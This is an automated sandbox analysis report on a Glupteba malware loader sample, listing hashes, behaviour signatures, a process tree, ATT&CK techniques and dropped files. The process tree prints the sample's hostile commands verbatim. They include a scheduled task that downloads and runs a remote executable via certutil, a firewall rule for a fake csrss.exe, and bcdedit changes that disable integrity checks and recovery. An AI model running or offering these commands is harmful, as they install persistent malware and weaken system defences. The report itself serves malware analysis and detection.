Analysis

  • max time kernel
    118s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    17-10-2020 12:05

General

  • Target

    app.exe

  • Size

    3.7MB

  • MD5

    668aa92e65133ae444a91f3246a8b25f

  • SHA1

    ef196259a3c3c563103e09c65e4ab8bb7c6a1e3c

  • SHA256

    482027d0e151826c175ff084f6e76ce4ca3a920ca648fc2d5906ed0a793fe8ad

  • SHA512

    c8d35a7ac7e0ebbd9a0b2486e473b7001173ef7f21e449eb25b9591924d9f6dbdabd138016afca0192ad832e04d1e52bd82126cac3ed77ed9f1df44edf705393

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • Windows security bypass 2 TTPs
  • Modifies boot configuration data using bcdedit 14 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Possible attempt to disable PatchGuard 2 TTPs

    Rootkits can use kernel patching to embed themselves in an operating system.

  • Loads dropped DLL 12 IoCs
  • Windows security modification 2 TTPs 12 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in Windows directory 2 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 58 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\app.exe
    "C:\Users\Admin\AppData\Local\Temp\app.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:1620
    • C:\Users\Admin\AppData\Local\Temp\app.exe
      "C:\Users\Admin\AppData\Local\Temp\app.exe"
      2⤵
      • Loads dropped DLL
      • Windows security modification
      • Adds Run key to start application
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1948
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1472
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies data under HKEY_USERS
          PID:1996
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe ""
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Loads dropped DLL
        • Modifies data under HKEY_USERS
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:980
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:768
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          4⤵
          • Creates scheduled task(s)
          PID:1416
        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
          "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Modifies system certificate store
          • Suspicious use of WriteProcessMemory
          PID:1396
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2024
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2044
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1852
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1364
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1080
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1400
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1232
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1536
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:984
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1220
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1756
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -timeout 0
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2040
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:396
        • C:\Windows\system32\bcdedit.exe
          C:\Windows\Sysnative\bcdedit.exe /v
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:1104
        • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
          C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
          4⤵
          • Executes dropped EXE
          PID:1268

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Command-Line Interface

1
T1059

Scheduled Task

1
T1053

Persistence

Modify Existing Service

1
T1031

Registry Run Keys / Startup Folder

1
T1060

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Disabling Security Tools

2
T1089

Modify Registry

4
T1112

Impair Defenses

1
T1562

Install Root Certificate

1
T1130

Discovery

Query Registry

1
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
    MD5

    d98e78fd57db58a11f880b45bb659767

    SHA1

    ab70c0d3bd9103c07632eeecee9f51d198ed0e76

    SHA256

    414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0

    SHA512

    aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

  • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
    MD5

    13aaafe14eb60d6a718230e82c671d57

    SHA1

    e039dd924d12f264521b8e689426fb7ca95a0a7b

    SHA256

    f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

    SHA512

    ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

  • C:\Windows\rss\csrss.exe
    MD5

    668aa92e65133ae444a91f3246a8b25f

    SHA1

    ef196259a3c3c563103e09c65e4ab8bb7c6a1e3c

    SHA256

    482027d0e151826c175ff084f6e76ce4ca3a920ca648fc2d5906ed0a793fe8ad

    SHA512

    c8d35a7ac7e0ebbd9a0b2486e473b7001173ef7f21e449eb25b9591924d9f6dbdabd138016afca0192ad832e04d1e52bd82126cac3ed77ed9f1df44edf705393

  • \Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
    MD5

    d98e78fd57db58a11f880b45bb659767

    SHA1

    ab70c0d3bd9103c07632eeecee9f51d198ed0e76

    SHA256

    414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0

    SHA512

    aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

  • \Users\Admin\AppData\Local\Temp\csrss\patch.exe
    MD5

    13aaafe14eb60d6a718230e82c671d57

    SHA1

    e039dd924d12f264521b8e689426fb7ca95a0a7b

    SHA256

    f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

    SHA512

    ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

  • \Users\Admin\AppData\Local\Temp\dbghelp.dll
    MD5

    f0616fa8bc54ece07e3107057f74e4db

    SHA1

    b33995c4f9a004b7d806c4bb36040ee844781fca

    SHA256

    6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026

    SHA512

    15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

  • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
    MD5

    1afff8d5352aecef2ecd47ffa02d7f7d

    SHA1

    8b115b84efdb3a1b87f750d35822b2609e665bef

    SHA256

    c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

    SHA512

    e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

  • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
    MD5

    1afff8d5352aecef2ecd47ffa02d7f7d

    SHA1

    8b115b84efdb3a1b87f750d35822b2609e665bef

    SHA256

    c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

    SHA512

    e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

  • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
    MD5

    1afff8d5352aecef2ecd47ffa02d7f7d

    SHA1

    8b115b84efdb3a1b87f750d35822b2609e665bef

    SHA256

    c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

    SHA512

    e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

  • \Users\Admin\AppData\Local\Temp\osloader.exe
    MD5

    e2f68dc7fbd6e0bf031ca3809a739346

    SHA1

    9c35494898e65c8a62887f28e04c0359ab6f63f5

    SHA256

    b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

    SHA512

    26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

  • \Users\Admin\AppData\Local\Temp\osloader.exe
    MD5

    e2f68dc7fbd6e0bf031ca3809a739346

    SHA1

    9c35494898e65c8a62887f28e04c0359ab6f63f5

    SHA256

    b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

    SHA512

    26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

  • \Users\Admin\AppData\Local\Temp\osloader.exe
    MD5

    e2f68dc7fbd6e0bf031ca3809a739346

    SHA1

    9c35494898e65c8a62887f28e04c0359ab6f63f5

    SHA256

    b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

    SHA512

    26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

  • \Users\Admin\AppData\Local\Temp\symsrv.dll
    MD5

    5c399d34d8dc01741269ff1f1aca7554

    SHA1

    e0ceed500d3cef5558f3f55d33ba9c3a709e8f55

    SHA256

    e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f

    SHA512

    8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

  • \Windows\rss\csrss.exe
    MD5

    668aa92e65133ae444a91f3246a8b25f

    SHA1

    ef196259a3c3c563103e09c65e4ab8bb7c6a1e3c

    SHA256

    482027d0e151826c175ff084f6e76ce4ca3a920ca648fc2d5906ed0a793fe8ad

    SHA512

    c8d35a7ac7e0ebbd9a0b2486e473b7001173ef7f21e449eb25b9591924d9f6dbdabd138016afca0192ad832e04d1e52bd82126cac3ed77ed9f1df44edf705393

  • \Windows\rss\csrss.exe
    MD5

    668aa92e65133ae444a91f3246a8b25f

    SHA1

    ef196259a3c3c563103e09c65e4ab8bb7c6a1e3c

    SHA256

    482027d0e151826c175ff084f6e76ce4ca3a920ca648fc2d5906ed0a793fe8ad

    SHA512

    c8d35a7ac7e0ebbd9a0b2486e473b7001173ef7f21e449eb25b9591924d9f6dbdabd138016afca0192ad832e04d1e52bd82126cac3ed77ed9f1df44edf705393

  • memory/396-52-0x0000000000000000-mapping.dmp
  • memory/980-16-0x0000000000000000-mapping.dmp
  • memory/980-19-0x0000000002950000-0x0000000002961000-memory.dmp
    Filesize

    68KB

  • memory/980-18-0x00000000025A0000-0x0000000002949000-memory.dmp
    Filesize

    3.7MB

  • memory/984-48-0x0000000000000000-mapping.dmp
  • memory/1080-44-0x0000000000000000-mapping.dmp
  • memory/1104-53-0x0000000000000000-mapping.dmp
  • memory/1220-49-0x0000000000000000-mapping.dmp
  • memory/1232-46-0x0000000000000000-mapping.dmp
  • memory/1268-55-0x0000000000000000-mapping.dmp
  • memory/1364-43-0x0000000000000000-mapping.dmp
  • memory/1396-35-0x0000000002B50000-0x0000000002B51000-memory.dmp
    Filesize

    4KB

  • memory/1400-45-0x0000000000000000-mapping.dmp
  • memory/1472-12-0x0000000000000000-mapping.dmp
  • memory/1512-33-0x000007FEF8510000-0x000007FEF878A000-memory.dmp
    Filesize

    2.5MB

  • memory/1536-47-0x0000000000000000-mapping.dmp
  • memory/1620-1-0x0000000002770000-0x0000000002781000-memory.dmp
    Filesize

    68KB

  • memory/1620-0-0x00000000023C0000-0x0000000002769000-memory.dmp
    Filesize

    3.7MB

  • memory/1620-2-0x0000000000400000-0x0000000000B16000-memory.dmp
    Filesize

    7.1MB

  • memory/1756-50-0x0000000000000000-mapping.dmp
  • memory/1852-42-0x0000000000000000-mapping.dmp
  • memory/1948-5-0x0000000000400000-0x0000000000B16000-memory.dmp
    Filesize

    7.1MB

  • memory/1948-3-0x0000000002380000-0x0000000002729000-memory.dmp
    Filesize

    3.7MB

  • memory/1948-4-0x0000000002730000-0x0000000002741000-memory.dmp
    Filesize

    68KB

  • memory/1996-13-0x0000000000000000-mapping.dmp
  • memory/2024-40-0x0000000000000000-mapping.dmp
  • memory/2040-51-0x0000000000000000-mapping.dmp
  • memory/2044-41-0x0000000000000000-mapping.dmp